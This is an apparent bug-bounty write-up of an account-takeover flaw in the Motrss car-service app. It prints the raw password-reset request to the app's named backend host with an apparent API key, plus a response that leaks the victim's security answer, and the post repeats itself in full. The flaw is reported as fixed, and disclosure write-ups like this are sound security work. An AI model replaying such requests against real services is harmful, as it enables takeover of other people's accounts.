Hi guys , Here is one of my simple write-up on Motrss account takeover . So basically Motrss is your one stop solution for all
automobile services. In just few clicks, book your next vehicle
servicing, repairing and maintenance service appointment.
So its a android app , there is a endpoint where some sensitive information was disclosed . Using those information attacker can takeover any user account .
The issue was in reset password functionality
so here the request of password reset
POST /GetUserSecurityQuestion
Content-Lenght: 67
Content-Type: application/x-www-form-urlencoded
Host: motrss.ap-south-1.elasticbeanstalk.com
Connection: close
User-Agent: Apache-HttpClient/UNVAILABLE (java 1.4)
user_id=victim@site.com&YEK_HTUA_SW=etyewt5788fjdfh
and here is the response
HTTP/1.1 200 OK
Date: Tue, 17 Jan 2017 09:58:41 GTM
Server: Apache
Content-Length : 116
Connect: close
Content-Type: text/html; charset-UTF-8
{"status":"Success","Data":[{"id":"7","questions":"What is your dream Job?","signup_status":"N","answer":"Google"}]}
so here in the response the security question answer reflected
now just use that answer and create new password and login
So here is the video Proof of concept
Status: Fixed
Bounty Rewarded
So its a android app , there is a endpoint where some sensitive information was disclosed . Using those information attacker can takeover any user account .
The issue was in reset password functionality
so here the request of password reset
POST /GetUserSecurityQuestion
Content-Lenght: 67
Content-Type: application/x-www-form-urlencoded
Host: motrss.ap-south-1.elasticbeanstalk.com
Connection: close
User-Agent: Apache-HttpClient/UNVAILABLE (java 1.4)
user_id=victim@site.com&YEK_HTUA_SW=etyewt5788fjdfh
and here is the response
HTTP/1.1 200 OK
Date: Tue, 17 Jan 2017 09:58:41 GTM
Server: Apache
Content-Length : 116
Connect: close
Content-Type: text/html; charset-UTF-8
{"status":"Success","Data":[{"id":"7","questions":"What is your dream Job?","signup_status":"N","answer":"Google"}]}
so here in the response the security question answer reflected
now just use that answer and create new password and login
So here is the video Proof of concept
Status: Fixed
Bounty Rewarded